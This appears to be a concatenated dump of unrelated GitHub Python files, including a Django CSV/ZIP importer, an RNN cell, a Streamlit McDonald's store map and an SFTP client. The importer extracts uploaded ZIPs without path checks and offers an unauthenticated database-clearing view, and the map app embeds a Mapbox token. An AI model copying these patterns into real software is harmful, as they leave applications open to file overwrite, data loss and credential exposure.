here.\n\n\n@method_decorator(login_required, name=\"dispatch\")\nclass ImportData(View):\n\n def get(self, request):\n return render(request, \"import-form.html\")\n\n def post(self, request):\n # for file in request.FILES:\n # print(file)\n csv_file = request.FILES.get('csv-file')\n pics_file = request.FILES.get('pics-file')\n\n if csv_file != None and not csv_file.name.endswith('.csv'):\n messages.error(request, \"Please provide CSV file of records\")\n return redirect(reverse('importdata:import-data'))\n\n if csv_file != None and csv_file.name.endswith('.csv'):\n\n teacherFile = TeachersFile(csvFile=csv_file, user=request.user)\n teacherFile.save()\n with open(teacherFile.csvFile.path, 'r') as teacher_csv:\n reader = csv.DictReader(teacher_csv)\n try:\n for line in reader:\n if not (line['First Name'] == '' and line['Last Name'] == '' and line['Email Address'] == ''):\n\n # print(line)\n try:\n current_teacher, isTCreated = Teacher.objects.get_or_create(\n email=line['Email Address']\n )\n current_teacher.firstname = line['First Name']\n current_teacher.lastname = line['Last Name']\n current_teacher.save()\n except Exception as error:\n print(error.__class__)\n\n for subject in line['Subjects taught'].split(', '):\n # print(subject.title())\n try:\n subject, isSubCreated = Subject.objects.get_or_create(\n name=subject.title())\n subject.save()\n\n if len(SubjectTaughtBy.objects.filter(teacher=current_teacher)) < 5:\n stby = SubjectTaughtBy.objects.create(\n teacher=current_teacher,\n subject=subject\n )\n stby.save()\n except IntegrityError:\n continue\n\n if line['Profile picture'] != '':\n current_teacher.image_url = line['Profile picture']\n\n if line['Phone Number'] != '':\n current_teacher.phoneNum = line['Phone Number']\n\n if line['Room Number'] != '':\n current_teacher.roomNum = line['Room Number']\n\n current_teacher.save()\n # print(line)\n except KeyError:\n messages.error(\n request, \"seems like you have choosen wrong csv file\")\n teacherFile.delete()\n return redirect(reverse('importdata:import-data'))\n\n messages.info(request, \"CSV file successfully imported!\")\n teacherFile.delete()\n\n if pics_file != None and not pics_file.name.endswith('.zip'):\n messages.error(request, \"Please provide ZIP file for Pictures\")\n return redirect(reverse('importdata:import-data'))\n\n if pics_file != None and pics_file.name.endswith('.zip'):\n # print(pics_file.name)\n zipProfileFile = ZipProfileFile.objects.create(\n picZipFile=pics_file)\n zipProfileFile.save()\n mediaPath = \"media/\"\n with ZipFile(zipProfileFile.picZipFile.path, 'r') as zipFileObj:\n # print(zipFileObj.printdir())\n zipFileObj.extractall(mediaPath)\n\n all_images = [f for f in listdir(mediaPath) if isfile(\n join(mediaPath, f))]\n for img in all_images:\n # print(img, type(img))\n try:\n teacher = Teacher.objects.get(image_url=img)\n teacher.image = img\n teacher.save()\n except Exception as e:\n # print(\"!!!!!!!!!\", e.__class__)\n continue\n messages.info(request, \"Pics file successfully imported!\")\n zipProfileFile.delete()\n\n return redirect(reverse('importdata:import-data'))\n\n\ndef clearDb(request):\n if request.method == \"POST\":\n Teacher.objects.all().delete()\n Subject.objects.all().delete()\n SubjectTaughtBy.objects.all().delete()\n messages.success(request, \"successfully cleared database\")\n return redirect(reverse('teachers:home'))\n","repo_name":"devksx/testRR","sub_path":"teacherdir/importdata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"17825230566","text":"#!/usr/bin/env/python\n\n\nfrom src.lib.os_handler import OSHandler\nfrom src.models.app import App\nfrom src.models.meta import Meta\nfrom os import listdir\nfrom os.path import isfile, join\nimport logging\nlogger = logging.getLogger('ducked')\n\nclass Indexer:\n\n OS = OSHandler()\n Meta = Meta()\n\n def check_synchronization(self):\n\n if self.needs_synchronization():\n self.index_apps()\n\n def needs_synchronization(self):\n\n initial_sync_completed = self.Meta.get(\"initial_sync_completed\")\n if initial_sync_completed == None or initial_sync_completed[\"value\"] == 0:\n logger.info(\"Initial sync required.\")\n return True\n else:\n return False\n\n def index_apps(self):\n\n logger.info(\"Begin indexing apps.\")\n\n # Mark all for deletion (update everything we can find, then delete the remainder)\n Application = App()\n Application.mark_all_for_deletion()\n\n # Index the installed apps\n self.index_installed_apps()\n\n # Index the indexable plugins\n self.index_plugin_apps()\n\n self.Meta.set(\"initial_sync_completed\", 1)\n logger.info(\"Finish indexing apps.\")\n\n # All done, remove the apps we didn't touch\n Application.mark_all_for_deletion()\n\n # Log can't grow too big, watch it for file size\n self.OS.cleanup_logs()\n\n def index_installed_apps(self):\n installed_apps = self.OS.get_installed_apps()\n\n for app in installed_apps:\n Application = App()\n Application.name = app[\"name\"]\n Application.icon = app[\"icon\"]\n Application.command = app[\"command\"]\n Application.source = \"installed\"\n Application.marked_for_deletion = 0\n Application.save()\n\n def index_plugin_apps(self):\n plugin_path = self.OS.cwd() + \"/plugins/indexables/\"\n plugins = [ f for f in listdir(plugin_path) if isfile(join(plugin_path,f)) ]\n\n for plugin in plugins:\n plugin_apps = self.OS.get_apps_from_plugin(plugin)\n\n if plugin_apps != None:\n for app in plugin_apps:\n Application = App()\n Application.name = app[\"name\"]\n Application.icon = app[\"icon\"]\n Application.command = app[\"command\"]\n Application.source = plugin\n Application.marked_for_deletion = 0\n Application.save()","repo_name":"koffiebaard/ducked","sub_path":"src/lib/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"35062753425","text":"import numpy as np\nfrom activation import *\n\n\nclass RNNCell(object):\n \"\"\"RNN Cell class.\"\"\"\n\n def __init__(self, input_size, hidden_size):\n\n self.input_size = input_size\n self.hidden_size = hidden_size\n\n # Activation function for\n self.activation = Tanh()\n\n # hidden dimension and input dimension\n h = self.hidden_size\n d = self.input_size\n\n # Weights and biases\n self.W_ih = np.random.randn(h, d)\n self.W_hh = np.random.randn(h, h)\n self.b_ih = np.random.randn(h)\n self.b_hh = np.random.randn(h)\n\n # Gradients\n self.dW_ih = np.zeros((h, d))\n self.dW_hh = np.zeros((h, h))\n\n self.db_ih = np.zeros(h)\n self.db_hh = np.zeros(h)\n\n def init_weights(self, W_ih, W_hh, b_ih, b_hh):\n self.W_ih = W_ih\n self.W_hh = W_hh\n self.b_ih = b_ih\n self.b_hh = b_hh\n\n def zero_grad(self):\n d = self.input_size\n h = self.hidden_size\n self.dW_ih = np.zeros((h, d))\n self.dW_hh = np.zeros((h, h))\n self.db_ih = np.zeros(h)\n self.db_hh = np.zeros(h)\n\n def __call__(self, x, h):\n return self.forward(x, h)\n\n def forward(self, x, h):\n \"\"\"RNN Cell forward (single time step).\n\n Input (see writeup for explanation)\n -----\n x: (batch_size, input_size)\n input at the current time step\n\n h: (batch_size, hidden_size)\n hidden state at the previous time step and current layer\n\n Returns\n -------\n h_prime: (batch_size, hidden_size)\n hidden state at the current time step and current layer\n\n \"\"\"\n # W_ih shape => hidden_size * input_size, x => batch_size * input_size\n # b_ih shape => hidden_size\n # W_hh shape => hidden_size * hidden_size, h => batch_size * hidden_size\n # b_hh shape => hidden_size\n # h_prime: (batch_size, hidden_size)\n\n affine_term_1 = np.dot(x, self.W_ih.T) + self.b_ih\n affine_term_2 = np.dot(h, self.W_hh.T) + self.b_hh\n h_prime = self.activation(affine_term_1 + affine_term_2)\n return h_prime\n\n\n def backward(self, delta, h, h_prev_l, h_prev_t):\n \"\"\"RNN Cell backward (single time step).\n\n Input (see writeup for explanation)\n -----\n delta: (batch_size, hidden_size)\n Gradient w.r.t the current hidden layer\n\n h: (batch_size, hidden_size)\n Hidden state of the current time step and the current layer\n\n h_prev_l: (batch_size, input_size)\n Hidden state at the current time step and previous layer\n (basically analogous to x from forward) \n\n h_prev_t: (batch_size, hidden_size)\n Hidden state at previous time step and current layer\n (basically analogous to h from forward) \n\n Returns\n -------\n dx: (batch_size, input_size)\n Derivative w.r.t. the current time step and previous layer\n\n dh: (batch_size, hidden_size)\n Derivative w.r.t. the previous time step and current layer\n\n \"\"\"\n batch_size = delta.shape[0]\n\n # 0) Done! Step backward through the tanh activation function.\n # Note, because of BPTT, we had to externally save the tanh state, and\n # have modified the tanh activation function to accept an optional input.\n dz = self.activation.derivative(state=h) * delta # => \n\n # backprop formulae\n # h_prime = activation(W_ih * x + W_hh * h)\n # dh_prime / dactivation = dz\n # dh_prime / dW_ih = (dh_prime / dactivation) * (dactivation / dW_ih) = dz * x , where x is h_prev_l\n # dh_prime / dW_hh = (dh_prime / dactivation) * (dactivation / dW_hh) = dz * h , where h is h_prev_t\n # dh_prime / db_ih = (dh_prime / dactivation) * 1 = dz\n # dh_prime / db_hh = (dh_prime / dactivation) * 1 = dz\n # dh_prime / dx = (dh_prime / dactivation) * (dactivation / dx) = dz * W_ih\n # dh_prime / dh = (dh_prime / dactivation) * (dactivation / dh) = dz * W_hh\n\n '''\n backprop shapes based on formulae\n #Note1: We take averages of actual derivatives shown below, as we are accumulating gradients over entire time vector\n dz : (batch_size * hidden_size)\n delta : (batch_size, hidden_size)\n dW_ih = dz * h_prev_l => (hidden_size * input_size) = (batch_size * hidden_size).T * (batch_size, input_size)\n dW_hh = dz * h_prev_t => (hidden_size * hidden_size) = (batch_size * hidden_size).T * (batch_size, hidden_size)\n db_ih = dz => (hidden_size) = (batch_size * hidden_size) , sum over batch_size axis\n \n dx = dz * W_ih => (batch_size, input_size) = (batch_size * hidden_size) * (hidden_size * input_size)\n dh = dz * W_hh => (batch_size, hidden_size) = (batch_size * hidden_size) * (hidden_size * hidden_size)\n '''\n\n # 1) Compute the averaged gradients of the weights and biases\n self.dW_ih += np.dot(dz.T, h_prev_l) / batch_size # division by batch_size: Note1\n self.dW_hh += np.dot(dz.T, h_prev_t) / batch_size \n self.db_ih += np.sum(dz, axis=0) / batch_size \n self.db_hh += np.sum(dz, axis=0) / batch_size \n\n '''\n #Note2: No storing or averaging done for dx, dh because @@@@@?? \n '''\n # 2) Compute dx, dh\n dx = np.dot(dz, self.W_ih) #no storing done here\n dh = np.dot(dz, self.W_hh)\n\n # 3) Return dx, dh\n return dx, dh","repo_name":"neelpawarcmu/deep-learning-course-projects","sub_path":"homework-3/hw3p1/mytorch/rnn_cell.py","file_name":"rnn_cell.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"72960713541","text":"import pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n\n\ndef preprocess_data(df):\n \"\"\"return the preprocessed dataframe\"\"\"\n scaler = MinMaxScaler()\n df = pd.DataFrame(scaler.fit_transform(df))\n return df\n\ndef derive_nth_day_feature(df_derive, df, feature, N):\n rows=df.shape[0]\n nth_prior_measurements = [None]*N + [df[feature][i-N] for i in range(N,rows)]\n col_name=\"{}_{}\".format(feature, N)\n df_derive[col_name]=nth_prior_measurements\n\ndef prepare_data(df):\n df_derive = df[['YEAR', 'Temperature']]\n for feature in df.columns:\n if feature not in ['YEAR','MO','DY']:\n for N in range(1,4):\n derive_nth_day_feature(df_derive, df, feature, N)\n df_derive.dropna(inplace = True)\n df_derive.reset_index(inplace = True)\n df_derive.drop(['index'], axis = 1, inplace = True)\n return df_derive\n\ndef load_data(data_path, preprocess=False):\n \"\"\"return Pandas dataframes of X, y from the original data\"\"\"\n df = pd.read_csv(data_path)\n feature_columns = [\n \"Relative_Humidity\",\n \"Specific_Humidity\",\n \"Precipitation\",\n \"Pressure\",\n \"Wind_Speed\",\n \"Wind_Direction\",\n ]\n df.drop(['Specific_Humidity', 'Wind_Direction', 'Pressure'], axis = 1, inplace = True)\n df_derive = prepare_data(df)\n train = df_derive[df_derive[\"YEAR\"] < 2021].drop('YEAR', axis = 1)\n test = df_derive[df_derive[\"YEAR\"] == 2021].drop('YEAR', axis = 1)\n X_train = train.drop('Temperature', axis = 1).values\n X_test = test.drop('Temperature', axis = 1).values\n if preprocess:\n X_train = preprocess_data(X_train)\n X_test = preprocess_data(X_test)\n y_train = train[\"Temperature\"]\n y_test = test[\"Temperature\"]\n return X_train, y_train, X_test, y_test\n","repo_name":"hungnt14/Regression_models","sub_path":"utils/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"17813313958","text":"from selenium import webdriver\nimport time\nimport random\nfrom fake_useragent import UserAgent\n\n# url = \"https://www.instagram.com/\"\n# user_agents_list = [\n# \n# ]\n\n# Change useragent\nuseragent = UserAgent()\n\n\n\n# Options\noptions = webdriver.ChromeOptions()\noptions.add_argument(f\"user-agent={useragent.random}\")\ndriver = webdriver.Chrome(\n options=options\n)\n# Set proxy\noptions.add_argument()\n\ntry:\n driver.get(url=\"https://www.whatismybrowser.com/detect/what-is-my-user-agent/\")\n time.sleep(5)\n\n\nexcept Exception as ex:\n print(ex)\n\n\nfinally:\n driver.close()\n driver.quit()\n","repo_name":"Diesel78q/SeleniumLearn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"35848106924","text":"from nbodykit.binned_statistic import BinnedStatistic\nfrom pyRSD.rsdfit.results import LBFGSResults\nfrom pyRSD.rsdfit import FittingDriver\nfrom pyRSD.rsdfit.parameters import ParameterSet\n\nfrom collections import defaultdict\nfrom glob import glob\nimport os\nimport numpy\n\ndef _load(box=None, los=None):\n \"\"\"\n Internal function to load the N-cubic results.\n \"\"\"\n d = os.environ['THESIS_DIR']\n d = os.path.join(d, 'boss_dr12_mocks', 'Results', 'ChallengeMocks', 'nbodykit', 'power')\n\n if los is not None:\n assert los in \"xyz\"\n\n # the pattern\n box = \"*\" if box is None else \"%d\" %box\n los = \"*\" if los is None else los\n\n files = glob(os.path.join(d, f\"pkmu_challenge_boxN{box}_unscaled_dk005_Nmu100_{los}los.dat\"))\n\n toret = []\n for f in files:\n toret.append(BinnedStatistic.from_plaintext(['k', 'mu'], f))\n\n return toret\n\ndef load_spectra(box=None, los=None, subtract_shot_noise=True, average=True):\n \"\"\"\n Load the N-cubic measurement results.\n\n Parameters\n ----------\n box : int, optional\n return the measurement for a specific box\n los : int, optional\n return the measurement for a specific los\n subtract_shot_noise : bool, optional\n whether or not to subtract out the shot noise\n average : bool, optional\n whether to average multiple results\n \"\"\"\n # load the results\n results = _load(box=box, los=None)\n assert len(results) > 0\n\n # return a single result\n if len(results) == 1:\n r = results[0]\n if subtract_shot_noise:\n r['power'].real -= r.attrs['volume'] / r.attrs['N1']\n return r\n\n # return all of the results, maybe averaged\n else:\n if subtract_shot_noise:\n for r in results:\n r['power'].real -= r.attrs['volume'] / r.attrs['N1']\n\n if not average:\n data = [r.data for r in results]\n data = numpy.asarray(data, dtype=data[0].dtype)\n return data\n else:\n data = results[0].copy()\n for k in results[0].variables:\n data[k] = numpy.asarray([r[k] for r in results]).mean(axis=0)\n return data\n\ndef load_fits():\n \"\"\"\n Load a set of fit results.\n\n Returns a structued numpy array holding best-fit values for all free\n parameters all mocks.\n \"\"\"\n # find matches\n pattern = os.path.join(os.environ['RSDFIT_FITS'], 'periodic', 'ChallengeBoxN', 'box*_*los')\n pattern = os.path.join(pattern, 'poles', 'nlopt_gausscov_base_kmax04')\n matches = glob(pattern)\n assert len(matches) > 0\n\n driver = None\n data = defaultdict(list)\n for f in matches:\n r = sorted(glob(os.path.join(f, '*.npz')), key=os.path.getmtime, reverse=True)\n assert len(r) > 0, \"no npz results found in directory '%s'\" %os.path.normpath(f)\n\n th = ParameterSet.from_file(os.path.join(f, 'params.dat'), tags='theory')\n r = LBFGSResults.from_npz(r[0])\n for param in r.free_names:\n data[param].append(r[param])\n th[param].value = r[param]\n\n if driver is None:\n driver = FittingDriver.from_directory(f, init_model=False)\n\n # add fsigma8\n if 'f' in r.free_names and 'sigma8_z' in r.free_names:\n data['fsigma8'].append(r['f'] * r['sigma8_z'])\n\n # the prior to add back\n lnprior = sum(par.lnprior for par in th.free)\n\n # add the reduced chi2\n red_chi2 = (2*(r.min_chi2 + lnprior)) / driver.dof\n data['red_chi2'].append(red_chi2)\n\n params = list(data.keys())\n dtype = list(zip(params, ['f8']*len(params)))\n out = numpy.empty(len(matches), dtype=dtype)\n for param in out.dtype.names:\n out[param] = numpy.array(data[param])\n\n return out\n\ndef load_bestfit_model():\n \"\"\"\n Return a GalaxySpectrum model initialized with the mean of the best-fitting\n theory for all 21 N-series cubic boxes.\n \"\"\"\n # the model file\n model = os.path.join(os.environ['RSDFIT'], 'data', 'models', 'model_nseries.npy')\n\n # the directory of box 1\n d = os.path.join(os.environ['RSDFIT_FITS'], 'periodic', 'ChallengeBoxN', 'box1_xlos')\n d = os.path.join(d, 'poles', 'nlopt_gausscov_base_kmax04')\n\n # the bestfit values\n fits = load_fits()\n print(\"taking the mean of %d fits...\" %len(fits))\n\n driver = FittingDriver.from_directory(d, model_file=model)\n theta = numpy.array([fits[name].mean() for name in driver.theory.free_names])\n driver.theory.set_free_parameters(theta)\n\n return driver.theory.model\n","repo_name":"nickhand/CutskyCovariance","sub_path":"python/cutskycov/sims/ncubic.py","file_name":"ncubic.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"27478365601","text":"from server import Route, Point\nimport json\n\nwith open(\"../mockdata/ways.json\") as f:\n waydata = json.load(f)\nwith open(\"../mockdata/nodes.json\") as f:\n nodedata = json.load(f)\n\nnodes, ways = Route.transform_json_nodes_and_ways(nodedata, waydata)\n\nstart_id = 8109379\nend_id = 8109400\n\nroute = Route.generate_route(nodes, ways, start_id, end_id)\nprint(route.route, route.distance)\n","repo_name":"sbhs-racepace/racepace-server","sub_path":"tests/route_testing/route_test.py","file_name":"route_test.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"18600935204","text":"\"\"\"\nName: Jacob Gavel\nCS230: SN5\nData: McDonald's\nURL: Link to your web application online (see extra credit)\n\nDescription: In this program the dataset for McDonalds stores is read in and used to create maps for the user.\nThe user is asked a variety of questions to help provide a base for the map and then the map can be interacted with to\nsee the features of the store and contact information about the store.\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pydeck as pdk\nimport streamlit as sl\nimport numpy as np\nimport random\n\nfile = \"mcdonalds_clean1.csv\"\ndat = pd.read_csv(file)\n\nsl.title(\"McDonald's Store Finder\",)\nsl.title(\"Store Locator\")\nrank = []\nfor rows in dat['state']:\n rank.append(0)\n\nstate = []\nfor states in dat[\"state\"]:\n if states not in state:\n state.append(states)\nstate.sort()\nstate_select = sl.selectbox(\"Select your desired state: \", state)\ncount = 0\nfor states in dat['state']:\n if states == state_select:\n rank[count] += 3\n count += 1\ncities = []\nfor city in (dat[\"city\"][dat[\"state\"] == state_select]):\n if city not in cities:\n cities.append(city)\ncities.sort()\ncities.append(\"Not listed\")\ncity_select = sl.selectbox(\"Selected your desired city: \", cities)\ncount = 0\nfor city in dat['city']:\n if city == city_select:\n rank[count] += 2\n count += 1\n\ndef variants():\n\n sl.title(\"Store Ranker\")\n\n play = sl.radio(\"Are you coming with children?\", ('Y', 'N'))\n\n count = 0\n for vals in dat[\"playplace\"]:\n if play == vals:\n rank[count] += 1\n count += 1\n\n thru = sl.radio(\"Are you in a rush?\", ('Y', 'N'))\n\n count = 0\n for vals in dat[\"driveThru\"]:\n if thru == vals:\n rank[count] += 1\n count += 1\n\n arch = sl.radio(\"Do you have an Archcard gift card?\", ('Y', 'N'))\n\n count = 0\n for vals in dat[\"archCard\"]:\n if arch == vals:\n rank[count] += 1\n count += 1\n\n wifi = sl.radio(\"Are you bringing your devices to the store?\", ('Y', 'N'))\n\n count = 0\n for vals in dat[\"freeWifi\"]:\n if wifi == vals:\n rank[count] += 1\n count += 1\n\n choice = []\n for choices in dat[\"storeType\"]:\n if choices not in choice:\n choice.append(choices)\n store_type = sl.selectbox(\"What else must be around the store? \", choice)\n count = 0\n for vals in dat[\"storeType\"]:\n if store_type == vals:\n rank[count] += 1\n count += 1\n\n dat[\"Rank\"] = rank\n df = dat.dropna()\n df = pd.DataFrame.to_csv(df, index=False)\ndef maps(state_select):\n\n sl.title(\"McDonald's In Your Area\")\n\n ICON_URL = \"https://upload.wikimedia.org/wikipedia/commons/thumb/3/36/McDonald%27s_Golden_Arches.svg/200px-McDonald%27s_Golden_Arches.svg.png\"\n\n icon_data = {\"url\": ICON_URL, \"width\": 242, \"height\": 242, \"anchorY\": 242,}\n dat[\"icon_data\"] = \"\"\n for i in dat.index:\n dat[\"icon_data\"][i] = icon_data\n loc = 0\n for vals in dat['city']:\n if vals == city_select:\n break\n loc += 1\n sl.pydeck_chart(pdk.Deck(\n layers=[\n pdk.Layer(\n type=\"IconLayer\",\n data=dat,\n get_icon='icon_data',\n get_size=5,\n size_scale=10,\n get_position='[lon, lat]',\n pickable=True, billboard=True),\n pdk.Layer(\n type=\"ScreenGridLayer\",\n data=dat,\n pickable=False,\n cell_size_pixels=25,\n color_range=[\n [25, 0, 0, 25], [50, 0, 0, 50], [76, 0, 0, 76], [101, 0, 0, 101], [127, 0, 0, 127],[152,0,0,152], [178, 0, 0, 178], [203, 0, 0 , 203], [255, 0, 0, 255]],\n opacity=0.4,\n get_position='[lon, lat]',\n get_weight= 'Rank > 0 ? Rank: 0')],\n map_style='mapbox://styles/mapbox/light-v9',\n mapbox_key= 'pk.eyJ1IjoiamdhdmVsIiwiYSI6ImNraXJwMjY1eDBiYWEycnFqdWVkbmd6N20ifQ.dKtTcikGLylstlqEuNwGpg',\n initial_view_state=pdk.ViewState(\n latitude=dat['lat'][loc],\n longitude=dat['lon'][loc],\n zoom=11, pitch=20),\n tooltip={\n \"html\": \"Store Number:
{storeNumber}
City and State:
{city} {state} , {zip}\"\n \"
Store URL:
{storeUrl}
Store Phone number:
{phone}\"\n \"
Rating:
{Rank} out of 10
\",\n \"style\": {\"backgroundColor\": \"crimson\", \"color\": \"white\"}}))\n\ndef plot(state_select, rank):\n sl.title(\"Data Analysis\")\n\n fig, chart = plt.subplots()\n chart.hist(dat['Rank'][state_select == dat['state']], bins=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,11], color='gold')\n chart.xaxis.set_label_text(\"Rating of the Stores\")\n chart.yaxis.set_label_text(\"Frequency of the Stores\")\n chart.set_xticks([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])\n chart.set_facecolor('crimson')\n fig.suptitle(f\"Histogram of the Ranked Stores in {state_select}\")\n sl.pyplot(fig)\n\n max_state = []\n max_city = []\n min_state = []\n min_city = []\n max_rank = dat['Rank'].max()\n min_rank = dat['Rank'].min()\n for i in dat.index:\n if dat['Rank'][i] == max_rank:\n max_state.append(dat['state'][i])\n max_city.append(dat['city'][i])\n if dat['Rank'][i] == min_rank:\n min_state.append(dat['state'][i])\n min_city.append(dat['city'][i])\n rand_select = random.randint(0, len(max_state) - 1)\n rand_selects = random.randint(0, len(min_state) - 1)\n if len(max_state) == 1:\n pronoun1 = \"is\"\n s1 = \"\"\n else:\n pronoun1 = \"are\"\n s1 = \"s\"\n if len(min_state) == 1:\n pronoun2 = \"is\"\n s2 = \"\"\n else:\n pronoun2 = \"are\"\n s2 = \"s\"\n sl.subheader(f\"There {pronoun1} {len(max_state)} store{s1} with the highest rating of {max_rank}, one such store is in {max_city[rand_select]}, {max_state[rand_select]}\")\n sl.subheader(f\"There {pronoun2} {len(min_state)} store{s2} with the lowest rating of {min_rank}, one such store is in {min_city[rand_selects]}, {min_state[rand_selects]}\")\n\n total = 0\n count = 1\n for vals in rank:\n total += vals\n count += 1\n mean= total / count\n\n return sl.subheader(f\"Mean rating = {mean}\")\ndef main():\n variants()\n maps(state_select)\n plot(state_select, rank)\nmain()\n","repo_name":"jakegavel/McDonalds","sub_path":"Final.py","file_name":"Final.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"39086896508","text":"import web\n\nfrom nailgun.api.v1.handlers import base\nfrom nailgun.api.v1.handlers.base import content\nfrom nailgun import objects\n\n\nclass DeploymentHistoryCollectionHandler(base.CollectionHandler):\n\n collection = objects.DeploymentHistoryCollection\n\n @content\n def GET(self, transaction_id):\n \"\"\":returns: Collection of JSONized DeploymentHistory objects.\n\n :http: * 200 (OK)\n * 404 (cluster not found in db)\n \"\"\"\n self.get_object_or_404(objects.Transaction, transaction_id)\n node_ids = web.input(nodes=None).nodes\n statuses = web.input(statuses=None).statuses\n\n if node_ids:\n node_ids = set(node_ids.strip().split(','))\n if statuses:\n statuses = set(statuses.strip().split(','))\n\n return self.collection.to_json(\n self.collection.get_history(\n transaction_id,\n node_ids,\n statuses)\n )\n","repo_name":"ReyhanehA/GDP43","sub_path":"104139_deployment_history.py_C__Users_user_Desktop_data_2_data_google_dat.py","file_name":"104139_deployment_history.py_C__Users_user_Desktop_data_2_data_google_dat.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"24925959100","text":"#this file is used to create the grid of a list\n#(now that I've realized my mistake, I know it would be better to use what I call lists in display.py\n#instead of grids but I'm too lazy to do that. I might do it some day, though)\ndef tf(s):\n #transforms single digit number strings into integers\n #if the input is not a single digit number string, it just returns \"\"\n #tf = transform\n s1=\"\"\n if s == \"0\":\n s1=0\n elif s == \"1\":\n s1=1\n elif s == \"2\":\n s1=2\n elif s == \"3\":\n s1=3\n elif s == \"4\":\n s1=4\n elif s == \"5\":\n s1=5\n elif s == \"6\":\n s1=6\n elif s == \"7\":\n s1=7\n elif s == \"8\":\n s1=8\n elif s == \"9\":\n s1=9\n return s1\ndef createGrid(list):\n #main function\n #creates the grid of a list\n grid=[\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"]\n a=0\n while a != 81:\n grid[a]=tf(list[a])\n a+=1\n return grid","repo_name":"GuePardo0/Sudoku-Solver","sub_path":"createGrid.py","file_name":"createGrid.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"14455327690","text":"# coding=utf-8\nfrom odoo import api, models\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n @api.model\n @api.returns('self', lambda value: value.id)\n def create(self, vals):\n res = super(SaleOrder, self.with_context(mail_create_nosubscribe=True)).create(vals)\n return res\n\n @api.multi\n def action_confirm(self):\n res = super(SaleOrder, self.with_context(mail_create_nosubscribe=True)).action_confirm()\n for sale in self:\n partner_follower_id = sale.message_follower_ids.filtered(lambda f: f.partner_id == sale.partner_id)\n partner_follower_id.unlink()\n return res\n","repo_name":"fesquivelc/itdev_raptor","sub_path":"partner_invite_prevent_it/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"25939941226","text":"import os\nimport re\nimport time\nimport logging\nfrom os import listdir\nfrom os.path import isfile, join\nimport shutil\nimport paramiko\nimport socks\nimport socket\nimport sys\nimport typing\n\nfrom d22d.model import midhardware\nfrom d22d.utils import log_info\nfrom d22d.utils.ziputils import makedirs\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\nclass ParamikoSftpClient(paramiko.SFTPClient):\n def cwd(self, path):\n self.chdir(path)\n\n def go_to_home(self, username):\n try:\n self.cwd('/home/' + username)\n except:\n self.cwd('/')\n\nNETWORK_ERR = (\n socket.timeout, # 直接断了\n EOFError, # 用代理断了\n socks.ProxyConnectionError, # 用代理的时候被拔网线\n OSError # 被拔网线\n)\n\nclass SftpController:\n # /!\\ Although the comments and variable names say 'file_name'/'file_anything' it inculdes folders also\n # Some functions in this class has no exception handling, it has to be done outside\n\n def __init__(self, host, port=22, username=' ', password=' '):\n # List to store file search and search keywords\n self.search_file_list = []\n self.detailed_search_file_list = []\n self.keyword_list = []\n\n # Variable to hold the max no character name in file list (used for padding in GUIs)\n self.max_len = 0\n self.max_len_name = ''\n\n # Variable to tell weather hidden files are enabled\n self.hidden_files = False\n\n self.work_dir_now = '/'\n\n self.host = host\n self.username = username\n self.password = password\n self.port = port\n\n def connect_until_success(self, retry=0):\n cnt_retry = 0\n while True:\n cnt_retry += 1\n try:\n log_info(f\"正在尝试第[{cnt_retry}/{retry}]次登录[{self}]。。。\")\n # 先无tls,在试试有tls\n self.ftp = None\n self.transport = paramiko.Transport((self.host, self.port))\n self.transport.connect(username=self.username, password=self.password)\n self.ftp = ParamikoSftpClient.from_transport(self.transport)\n return\n except Exception as inst:\n if retry and cnt_retry > retry:\n raise inst\n print_func = logger.error\n if not isinstance(inst, NETWORK_ERR):\n print_func = logger.exception\n print_func(f\"第[{cnt_retry}/{retry}]次登录[{self}]失败 [{type(inst)}] {inst}, 5秒后重试。。。\")\n time.sleep(5)\n\n def connect_to(self):\n self.transport = paramiko.Transport((self.host, self.port))\n self.transport.connect(username=self.username, password=self.password)\n self.ftp = ParamikoSftpClient.from_transport(self.transport)\n # 